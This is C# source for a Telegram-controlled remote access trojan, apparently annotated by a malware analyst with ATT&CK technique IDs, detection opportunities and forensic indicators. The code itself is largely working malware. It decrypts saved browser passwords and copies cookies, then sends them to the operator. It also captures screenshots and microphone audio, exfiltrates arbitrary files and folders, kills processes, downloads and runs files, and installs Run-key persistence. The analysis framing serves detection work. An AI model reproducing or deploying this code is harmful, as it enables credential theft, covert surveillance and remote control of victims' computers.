// Builds the static help text listing the operator commands and sends it
// through TelegramSystem.SendMessage (defined outside this view).
// Analyst note: the command names and usage strings below are fixed literals,
// so they are stable string indicators for static signatures on this family.
public static void SendCommands()
{
    string response = "/open_link|<link> - open some link in browser\n" +
        "/download_execute|<link> - download and instant open file\n" +
        "/exit - close bot\n/ddos|<ip>|<threads> - in developing" +
        "\n/GetCookieFile - get cookies from browsers\n" +
        "/GetSystem - get system specs\n" +
        "/GetProcess - get tasklist\n" +
        "/KillProcess|<process name> - kill process\n" +
        "/ls|<path> - get files and folders in <path>\n" +
        "To upload update you need to attach update\n " +
        "with caption \"/UploadUpdate\" \n" +
        "To upload file and open it you need to attach file\n " +
        "with caption \"/UploadExecute\"\n" +
        "/DownloadFile|<full path to file> - download file\n" +
        "/DownloadFolder|<full path to folder> - download files from folder in zip archive\n" +
        "/CaptureCam - get snapshot (in developing)\n/TakeScreenShot - take screenshot\n" +
        "/GetGooglePasswords - get passwords from google\n" +
        "/RecordAudio|<time in secs (5 is default)>\n" +
        "/MessageBox|<message>|<caption> - show message box\n" +
        "/OpenFile|<full path to file> - open file\n" +
        "If you wonna just send a file without execute you can simply send this file without any caption\n" +
        "If you are sending audio, photo or video file send it like a file/help - get command list";
    TelegramSystem.SendMessage(response);
}
// Host reconnaissance (ATT&CK T1082 System Information Discovery): collects OS
// product name, user name, architecture, logical drives, CPU, GPU, RAM, local
// and external IP and MAC address, then sends the report over Telegram.
// Observable behaviour: a read of ProductName under the WOW6432Node
// CurrentVersion key and two WMI queries against root\CIMV2
// (Win32_VideoController, Win32_Processor) from a non-administrative tool.
// GetMacAddress, GetIp, GetLocalIp and cMain.Is64Bit are defined outside this view.
public static void GetSystem()
{
    string name = string.Empty;
    string VideoProc = string.Empty;
    string Capacity = string.Empty;
    string procName = string.Empty;
    string mac = string.Empty;
    string response = string.Empty;
    string SysVer = (string)Registry.GetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion", "ProductName", null);
    GetMacAddress(out mac);
    ManagementObjectSearcher searcher2 = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController");
    // Only the values of the last adapter returned are kept; VideoProc and
    // Capacity are assigned here but never added to the report below.
    foreach (ManagementObject queryObj in searcher2.Get())
    {
        name = queryObj["Caption"].ToString();
        VideoProc = string.Format("Семейство: {0}", queryObj["VideoProcessor"]);
        Capacity = string.Format("Обьем: {0}", queryObj["AdapterRAM"]);
    }
    ManagementObjectSearcher mos = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_Processor");
    foreach (ManagementObject mo in mos.Get())
    {
        procName = mo["Name"].ToString();
    }
    ComputerInfo CI = new ComputerInfo();
    ulong mem = ulong.Parse(CI.TotalPhysicalMemory.ToString());
    string ram = Math.Round(Convert.ToDouble(mem / (1024 * 1024) / 1000), 0).ToString();
    // The report is plain text; its field labels ("User name: ", "OS Version: ",
    // "Core count: ", ...) are fixed literals and usable as string indicators.
    response += $"System [{GetIp()}] \n";
    response += "User name: " + Environment.UserName + "\n";
    response += ("OS Version: " + SysVer + "\n");
    if (cMain.Is64Bit())
    {
        response += ("OS Аrchitecture: 64bit\n");
    }
    else
    {
        response += ("OS Аrchitecture: 32bit");
    }
    response += ("Local drives: ");
    foreach (var loc in Environment.GetLogicalDrives())
    {
        response += (loc + " ");
    }
    response += ("\n");
    response += ("Core count: " + Environment.ProcessorCount + "\n");
    response += ("Processor name: " + procName + "\n");
    response += ("Video card: " + name + "\n");
    response += ("RAM: " + ram + " GB\n");
    response += ("\n");
    response += ("Local IP: " + GetLocalIp() + "\n");
    response += ("IP: " + GetIp() + "\n");
    response += ("MAC: " + mac + "\n");
    TelegramSystem.SendMessage(response);
}
// Exfiltrates a single file: if `path` exists it is sent to the operator as a
// Telegram document, otherwise an error text is sent instead.
// `path` is whatever followed "/DownloadFile|" in the operator's message (see
// the dispatcher's call site); nothing here limits it to a directory, so any
// file readable by the current user can leave the host this way.
public static void DownloadFile(string path)
{
    if (File.Exists(path))
    {
        TelegramSystem.SendDocument(path, $"DownloadFile [{GetIp()}]");
    }
    else
    {
        TelegramSystem.SendMessage($"[File downloader] File doesn't exists.");
    }
}
// Screen capture (ATT&CK T1113): copies the primary screen into a bitmap,
// saves it as "screen.png" and sends that file over Telegram.
// Forensic artifact: "screen.png" is a relative path, so the file is written
// to the process's current working directory and is not removed here.
public static void TakeScreenShot()
{
    Graphics gr;
    // Only Screen.PrimaryScreen is captured; secondary monitors are not read.
    Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
    gr = Graphics.FromImage(bmp);
    gr.CopyFromScreen(0, 0, 0, 0, bmp.Size);
    bmp.Save("screen.png", ImageFormat.Png);
    TelegramSystem.SendDocument("screen.png", "[ScreenShot] Screenshot like document.");
}
// Handler for every message the bot receives; this is the command-and-control
// entry point. Messages carrying a document are written to disk under
// %APPDATA%\BotFiles (ingress tool transfer, ATT&CK T1105) and, depending on the
// caption, launched; text messages are parsed into a `cmd` and dispatched.
// Detection opportunities visible here: file creation under
// <ApplicationData>\BotFiles by this process, followed by Process.Start on the
// written path, and long-lived traffic to the Telegram Bot API from a
// non-messenger executable. `bot`, `cmd` and `Execute` are defined elsewhere.
private static async void OnTelegramMessage(object sender, Telegram.Bot.Args.MessageEventArgs e)
{
    if (e.Message.Document != null && e.Message.Caption.Contains("/UploadUpdate")) // TODO: implement unpacking and launching of the file. Make a working method for using the command
    {
        // Artifact: a DIRECTORY named after the attachment is created, and the
        // attachment is stored inside it under the same name.
        string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\" + e.Message.Document.FileName;
        Directory.CreateDirectory(path);
        var file = await bot.GetFileAsync(e.Message.Document.FileId);
        using (var saveFile = new FileStream(path + "\\" + e.Message.Document.FileName, FileMode.Create))
        {
            await bot.DownloadFileAsync(file.FilePath, saveFile);
        }
        // Process.Start receives the directory path built above, not the file.
        Process.Start(path);
    }
    else if (e.Message.Document != null && e.Message.Caption == "/UploadExecute")
    {
        // Attachment is saved as <ApplicationData>\BotFiles\<FileName> and
        // started directly; the file name is taken from the message as-is.
        string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\";
        Directory.CreateDirectory(path);
        path += e.Message.Document.FileName;
        var file = await bot.GetFileAsync(e.Message.Document.FileId);
        using (var saveFile = new FileStream(path, FileMode.Create))
        {
            await bot.DownloadFileAsync(file.FilePath, saveFile);
        }
        try
        {
            Process.Start(path);
        }
        catch
        {
            // Any launch failure is reported to the operator with the host IP.
            TelegramSystem.SendMessage($"[ERROR] [{Functions.GetIp()}] Something wrong");
        }
    }
    else if (e.Message.Document != null)
    {
        // Any other attachment is only stored (same directory-per-file layout
        // as the "/UploadUpdate" branch) and not launched.
        string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\" + e.Message.Document.FileName;
        Directory.CreateDirectory(path);
        var file = await bot.GetFileAsync(e.Message.Document.FileId);
        using (var saveFile = new FileStream(path + "\\" + e.Message.Document.FileName, FileMode.Create))
        {
            await bot.DownloadFileAsync(file.FilePath, saveFile);
        }
    }
    else
    {
        // Plain text: parsed by the `cmd` constructor and handed to Execute.
        cmd command = new cmd(e.Message.Text);
        Execute(command);
    }
}
// Process discovery (ATT&CK T1057): enumerates all running processes and sends
// one "ID: <pid> Name: <name>" line per process to the operator.
// The operator can use this list to spot security tooling on the host, so a
// process listing followed by targeted process termination is worth correlating.
public static void GetProcess()
{
    string response = $"Task list {GetIp()}\n";
    // `prc` is created but never used.
    Process prc = new Process();
    Process[] processes = Process.GetProcesses();
    foreach (var process in processes)
    {
        response += ("ID: " + process.Id + " Name: " + process.ProcessName.ToLower() + "\n");
    }
    TelegramSystem.SendMessage(response);
}
// Terminates every process whose NAME matches the argument (case-insensitive);
// despite the parameter name `processID`, no numeric PID is compared.
// The confirmation message is sent before Kill() is called, so the operator is
// told the process was killed whether or not the call then succeeds.
// Detection: process termination of unrelated (especially security or browser)
// processes initiated by a user-context executable.
public static void KillProcess(string processID) // Closes the process and sends a confirmation
{
    // `prc` is created but never used.
    Process prc = new Process();
    Process[] processes = Process.GetProcesses();
    foreach (var process in processes)
    {
        if (process.ProcessName.ToLower() == processID.ToLower())
        {
            TelegramSystem.SendMessage($"[Process killer] Process [{processID}] has been killed!");
            process.Kill();
        }
    }
}
// Browser cookie theft (ATT&CK T1539 Steal Web Session Cookie): copies cookie
// stores from hard-coded Chrome, Opera, Yandex Browser and Windows/IE locations
// into <ApplicationData>\Bot, zips that folder and sends the archive over Telegram.
// Detection opportunities: a non-browser process reading "...\User Data\...\Cookies",
// browsers being terminated just before (KillBrowsers is defined elsewhere;
// presumably it closes browsers so the files are unlocked - confirm), and a
// staging directory named "Bot" under the roaming AppData folder.
// Stolen session cookies let a third party reuse logged-in sessions, so
// response to this behaviour includes invalidating the user's active sessions.
public static void GetCookieAndLoginData()
{
    string directory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Bot";
    Directory.CreateDirectory(directory);
    KillBrowsers();
    string username = Environment.UserName;
    // Paths assume the profile lives at C:\Users\<user name>.
    string[] pathes = {
        $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies",
        $"C:\\Users\\{username}\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies",
        $"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies",
        $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 1\\Cookies",
        $"C:\\Users\\{username}\\AppData\\Local\\Microsoft\\Windows\\INetCookies",
        $"C:\\Users\\{username}\\AppData\\Local\\Microsoft\\Windows\\Cookies"
    };
    int counter = 0;
    foreach (var path in pathes)
    {
        // Debug output; Main hides the console window, so it is not visible to the user.
        Console.WriteLine(path);
        Console.WriteLine(File.Exists(path));
        if (File.Exists(path))
        {
            // Staged copy is named "<file name> <config.browsers[counter]>";
            // config.browsers is defined elsewhere and indexed in step with `pathes`.
            Console.WriteLine(File.Exists(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}"));
            if (File.Exists(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}"))
            {
                File.Delete(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}");
                File.Copy(path, directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}");
            }
            else
            {
                File.Copy(path, directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}");
            }
        }
        // Incremented for every path checked, copied or not.
        counter++;
    }
    string folder = ZipFolder(directory);
    TelegramSystem.SendDocument(folder, $"[COOKIES] Got {counter} cookies [{GetIp()}]");
}
// Archives one file into "<current directory>\<file name without extension>.zip"
// using Ionic.Zip and returns the archive path (ATT&CK T1560 Archive Collected
// Data when used ahead of exfiltration).
// On failure the exception text is sent to the operator and the intended
// archive path is still returned, whether or not the archive exists.
// Forensic artifact: .zip files appearing in the process's working directory.
public static string ZipFile(string path)
{
    string pathToSave = Environment.CurrentDirectory + $"\\{Path.GetFileNameWithoutExtension(path)}" + ".zip";
    try
    {
        using (Ionic.Zip.ZipFile zip = new Ionic.Zip.ZipFile())
        {
            // `di` is created but never used.
            DirectoryInfo di = new DirectoryInfo(path);
            zip.AddFile(path);
            zip.Save(pathToSave);
        }
    }
    catch (Exception ex)
    {
        TelegramSystem.SendMessage($"[ZipFile ERROR] {ex.Message}");
    }
    return(pathToSave);
}
// Archives a whole directory into "<config.appData>\<directory name>.zip" using
// Ionic.Zip and returns the archive path; this is the staging step used before
// cookies, password dumps and operator-chosen folders are sent out.
// On failure the exception text is sent to the operator and the path built so
// far is still returned. config.appData is defined outside this view.
// Forensic artifact: .zip files named after collected folders under config.appData.
public static string ZipFolder(string folder)
{
    string pathToSave = config.appData;
    try
    {
        using (Ionic.Zip.ZipFile zip = new Ionic.Zip.ZipFile())
        {
            DirectoryInfo di = new DirectoryInfo(folder);
            pathToSave += "\\" + di.Name + ".zip";
            zip.AddDirectory(folder);
            zip.Save(pathToSave);
        }
    }
    catch (Exception ex)
    {
        TelegramSystem.SendMessage($"[ZipFolder ERROR] {ex.Message}");
    }
    return(pathToSave);
}
// File and directory discovery (ATT&CK T1083): lists the names of the
// sub-directories and then the files directly under `path` (not recursive) and
// sends the listing to the operator; any exception is reported instead.
// The header always mentions "D:\BotFiles\ " regardless of the path listed, so
// that literal is a string indicator rather than a statement of what was read.
public static void GetFiles(string path)
{
    string response = $"Files and directories [{GetIp()}] [\"D:\\BotFiles\\ \"]: \n";
    try
    {
        DirectoryInfo dir = new DirectoryInfo(path);
        foreach (var item in dir.GetDirectories())
        {
            response += item.Name + "\n";
        }
        foreach (var item in dir.GetFiles())
        {
            response += item.Name + "\n";
        }
        TelegramSystem.SendMessage(response);
    }
    catch (Exception ex)
    {
        TelegramSystem.SendMessage($"[ERROR] [{GetIp()}] {ex.Message}");
    }
}
// Audio capture (ATT&CK T1123): records from the default input device for
// `time` seconds plus one (default "5"), writes 44.1 kHz mono audio to
// <config.appData>\BotFiles\waveS.wav and sends the file over Telegram.
// A non-numeric `time` only produces an error message to the operator.
// Detection opportunities: microphone access by a windowless process and the
// fixed file name waveS.wav under the BotFiles directory.
// WaveInEvent / WaveFileWriter look like NAudio types (confirm against the
// project references); `waveFile` and `waveSource_DataAvailable` are defined
// outside this view.
public static void RecordAudio(string time = "5")
{
    int delay;
    if (!int.TryParse(time, out delay))
    {
        TelegramSystem.SendMessage("[RecordAudio ERROR] Write correct seconds.");
    }
    else
    {
        delay += 1;
        string path = config.appData + "\\BotFiles\\waveS.wav";
        try
        {
            WaveInEvent waveSource = new WaveInEvent();
            //waveSource.DeviceNumber = 0;
            waveSource.WaveFormat = new WaveFormat(44100, 1);
            waveSource.DataAvailable += new EventHandler <WaveInEventArgs>(waveSource_DataAvailable);
            string tempFile = path;
            waveFile = new WaveFileWriter(tempFile, waveSource.WaveFormat);
            waveSource.StartRecording();
            // The calling thread is blocked for the whole recording.
            Thread.Sleep(delay * 1000);
            try
            {
                waveSource.StopRecording();
                waveFile.Dispose();
                TelegramSystem.SendDocument(path, $"[RecordAudio {GetIp()}]");
            }
            catch (Exception ex)
            {
                TelegramSystem.SendMessage($"[RecordAudio ERROR] {ex.Message}");
            }
        }
        catch (Exception ex)
        {
            TelegramSystem.SendMessage($"[RecordSound ERROR] {ex.Message}");
        }
    }
}
// Program entry point: installs persistence, announces the host to the
// operator, hides the console window and starts receiving Telegram messages.
// Indicators visible in this method:
//  - Persistence (ATT&CK T1547.001): a value named config.currProc is written
//    under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pointing to the
//    hard-coded path "D:\BotFiles\TeleRat.exe".
//  - Hidden window (ATT&CK T1564.003): the console is hidden via ShowWindow/SW_HIDE.
//  - C2 over a web service: a TelegramBotClient is created from `Token`, which
//    is defined outside this view; in a recovered sample that token identifies
//    the operator's bot.
// `IP`, `Token`, `bot`, `signalHandler`, GetConsoleWindow, ShowWindow, SW_HIDE
// and ConsoleHelper are defined elsewhere.
static void Main(string[] args)
{
    Microsoft.Win32.RegistryKey Key =
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey(
        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", true);
    // The first parameter is the name of the registry value.
    // The second parameter is the path to
    // the program's executable file.
    Key.SetValue(config.currProc, "D:\\BotFiles\\TeleRat.exe");
    Key.Close();
    TelegramSystem.SendMessage($"Bot [{IP}] is online");
    var handle = GetConsoleWindow();
    ShowWindow(handle, SW_HIDE);
    // Registers HandleConsoleSignal so an "offline" notice is sent on console signals.
    signalHandler += HandleConsoleSignal;
    ConsoleHelper.SetSignalHandler(signalHandler, true);
    bot = new TelegramBotClient(Token);
    bot.OnMessage += OnTelegramMessage;
    bot.StartReceiving();
    // Keeps the process alive while messages are handled on other threads.
    Console.ReadKey();
}
// Command dispatcher: maps the parsed operator message (CMD.ComType,
// CMD.ComContent, CMD.ComThreads) onto the capability methods in Functions.
// A command identical to the previously stored one is ignored; after any other
// command the pair "<ComType>|<ComContent>" is written to lastCMD.txt.
// Forensic artifact: lastCMD.txt holds the last operator command in plain text.
// Its path is the ApplicationData folder path concatenated with "lastCMD.txt"
// with no separator; GetFolderPath normally returns no trailing backslash, so
// look for a file named "<folder name>lastCMD.txt" beside the roaming AppData
// folder rather than inside it.
// `cmd`, `commandList`, Functions.OpenLink, DownloadExecute, ShowMessageBox and
// the other Functions members are defined outside this view.
static void Execute(cmd CMD)
{
    string text = string.Empty;
    if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt"))
    {
        StreamReader reader = new StreamReader(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt");
        text = reader.ReadToEnd();
        reader.Close();
    }
    else
    {
        // First run: creates an empty lastCMD.txt.
        StreamWriter Writer = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt");
        Writer.AutoFlush = true;
        Writer.Close();
    }
    if (text == CMD.ComType + "|" + CMD.ComContent)
    {
        // Same command as the stored one: nothing is executed.
    }
    else
    {
        switch (CMD.ComType)
        {
            case "/open_link":
                if (CMD.ComContent == null)
                {
                    TelegramSystem.SendMessage("Usage - /open_link|<link> (without <>)");
                }
                else
                {
                    Functions.OpenLink(CMD.ComContent);
                }
                break;
            case "/download_execute":
                if (CMD.ComContent == null)
                {
                    TelegramSystem.SendMessage("Usage - /download_execute|<link> (without <>)");
                }
                else
                {
                    Functions.DownloadExecute(CMD.ComContent);
                }
                break;
            case "/exit":
                Environment.Exit(0);
                break;
            case "/ddos":
                // Listed in the help text as "in developing"; no action is taken here.
                break;
            case "/GetCookieFile":
                Functions.GetCookieAndLoginData();
                break;
            case "/GetSystem":
                Functions.GetSystem();
                break;
            case "/GetProcess":
                Functions.GetProcess();
                break;
            case "/MessageBox":
                // ComThreads carries the message-box caption for this command.
                if (CMD.ComContent == null || CMD.ComThreads == null)
                {
                    TelegramSystem.SendMessage("Usage - /MessageBox|<message>|<caption> (without <>)");
                }
                else
                {
                    Functions.ShowMessageBox(CMD.ComContent, CMD.ComThreads);
                }
                break;
            case "/KillProcess":
                if (CMD.ComContent == null)
                {
                    TelegramSystem.SendMessage("Usage - /KillProcess|<process name> (without <>)");
                }
                else
                {
                    Functions.KillProcess(CMD.ComContent);
                }
                break;
            case "/ls":
                // With no argument the hard-coded "D:\BotFiles\" directory is listed.
                if (CMD.ComContent == null)
                {
                    Functions.GetFiles("D:\\BotFiles\\");
                }
                else
                {
                    Functions.GetFiles(CMD.ComContent);
                }
                break;
            case "/DownloadFile":
                if (CMD.ComContent == null)
                {
                    TelegramSystem.SendMessage("Usage - /DownloadFile|<full path to file> (without <>)");
                }
                else
                {
                    Functions.DownloadFile(CMD.ComContent);
                }
                break;
            case "/CaptureCam":
                //Functions.CaptureCam(); // TODO: Snapshot from the webcam
                break;
            case "/TakeScreenShot":
                Functions.TakeScreenShot();
                break;
            case "/GetGooglePasswords":
                Functions.GetGooglePasswords(); // TODO: Archive the files into a .zip archive
                break;
            case "/ping":
                TelegramSystem.SendMessage($"[Ping] [{Functions.GetIp()}] I'm up");
                break;
            case "/OpenFile":
                if (CMD.ComContent == null)
                {
                    TelegramSystem.SendMessage("Usage - /OpenFile|<full path to file> (without <>)");
                }
                else
                {
                    // The operator-supplied string is handed to Process.Start unchanged.
                    Process.Start(CMD.ComContent);
                }
                break;
            case "/DownloadFolder":
                if (CMD.ComContent == null)
                {
                    TelegramSystem.SendMessage("Usage - /DownloadFolder|<full path to folder> (without <>)");
                }
                else
                {
                    Functions.DownloadFolder(CMD.ComContent);
                }
                break;
            case "/help":
                Functions.SendCommands();
                break;
            case "/RecordAudio":
                if (CMD.ComContent != null)
                {
                    Functions.RecordAudio(CMD.ComContent);
                }
                else
                {
                    Functions.RecordAudio();
                }
                break;
            default:
                // Help is sent only when ComType contains none of the entries in commandList.
                int i = 1;
                foreach (var command in commandList)
                {
                    if (CMD.ComType.Contains(command))
                    {
                        i = 0;
                    }
                }
                if (i != 0)
                {
                    Functions.SendCommands();
                }
                break;
        }
        // Persist the command just handled so an identical repeat is skipped.
        StreamWriter Writer = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt");
        Writer.AutoFlush = true;
        Writer.Write(CMD.ComType + "|" + CMD.ComContent);
        Writer.Close();
    }
}
// Console signal callback registered in Main: tells the operator the host is
// going offline, then waits 750 ms before returning (presumably so the message
// can be sent before the process ends - confirm against ConsoleHelper).
// The "Bot [<IP>] is online/offline" texts are fixed string indicators.
private static void HandleConsoleSignal(ConsoleSignal consoleSignal, int returnedValue)
{
    TelegramSystem.SendMessage($"Bot [{IP}] is offline");
    Thread.Sleep(750);
}
// Browser credential theft (ATT&CK T1555.003 Credentials from Web Browsers):
// for each hard-coded Chrome / Opera / Yandex Browser login database that
// exists, opens it with SQLite, reads every row of the `logins` table, decrypts
// column 5 through DPAPI.Decrypt (helper defined elsewhere; presumably a
// wrapper over Windows DPAPI - confirm) and writes URL, login and password in
// clear text to <config.appData>\BotFiles\passes\pass <config.passes[n]>.txt.
// The folder is then zipped and sent over Telegram.
// Detection opportunities: a non-browser process opening "Login Data" files,
// browsers being terminated just before (KillBrowsers is defined elsewhere),
// and plaintext "pass *.txt" files plus a zip under the BotFiles directory.
// Response: treat every credential saved in the affected browser profiles as
// exposed and rotate it; the plaintext dump files remain on disk afterwards.
public static void GetGooglePasswords()
{
    string username = Environment.UserName;
    // Paths assume the profile lives at C:\Users\<user name>.
    string[] pathes = {
        $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
        $"C:\\Users\\{username}\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data",
        $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 1\\Login Data",
        $"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data",
        $"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker"
    };
    KillBrowsers();
    try
    {
        int counter = 0;
        foreach (var db_way in pathes)
        {
            if (File.Exists(db_way))
            {
                Directory.CreateDirectory($"{config.appData}\\BotFiles\\passes");
                // One output file per database; config.passes is indexed in step with `pathes`.
                string filename = $"{config.appData}\\BotFiles\\passes\\pass {config.passes[counter]}.txt";
                StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8);
                string db_field = "logins";
                // No additional entropy is passed to the decrypt call.
                byte[] entropy = null;
                string description;
                string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True";
                DataTable DB = new DataTable();
                // The table name is a local constant, not operator input.
                string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", "");
                using (SQLiteConnection connect = new SQLiteConnection(ConnectionString))
                {
                    SQLiteCommand command = new SQLiteCommand(sql, connect);
                    SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);
                    adapter.Fill(DB);
                    int rows = DB.Rows.Count;
                    for (int i = 0; i < rows; i++)
                    {
                        // Column 5 is read as the encrypted password blob.
                        byte[] byteArray = (byte[])DB.Rows[i][5];
                        byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);
                        string password = new UTF8Encoding(true).GetString(decrypted);
                        // Rows with neither a password nor a login (column 3) are skipped.
                        if (password == string.Empty && DB.Rows[i][3].ToString().Trim() == string.Empty)
                        {
                            continue;
                        }
                        else
                        {
                            Writer.Write(i + 1 + ") "); // Sequence number of the "site-login-password" entry
                            Writer.WriteLine($"URL: [{DB.Rows[i][1]}]"); // site URL
                            Writer.WriteLine($"Login: [{DB.Rows[i][3]}]"); // login
                            Writer.WriteLine($"Password: [{password}]");
                            Writer.WriteLine();
                        }
                    }
                    Writer.Close();
                }
            }
            counter++;
        }
        string folder = ZipFolder($"{config.appData}\\BotFiles\\passes");
        TelegramSystem.SendDocument(folder, "[Passwords] Well done!");
    }
    catch (Exception ex)
    {
        // Any failure aborts the whole run and only the message text is reported.
        TelegramSystem.SendMessage($"[Passwords] {ex.Message}");
    }
}
// Exfiltrates a whole directory: zips the operator-supplied folder with
// ZipFolder and sends the resulting archive as a Telegram document.
// `path` comes from the "/DownloadFolder|<path>" command and is not restricted
// here, so any folder readable by the current user can be archived and sent.
// The archive is left at the location ZipFolder returns.
public static void DownloadFolder(string path)
{
    string zip = ZipFolder(path);
    TelegramSystem.SendDocument(zip);
}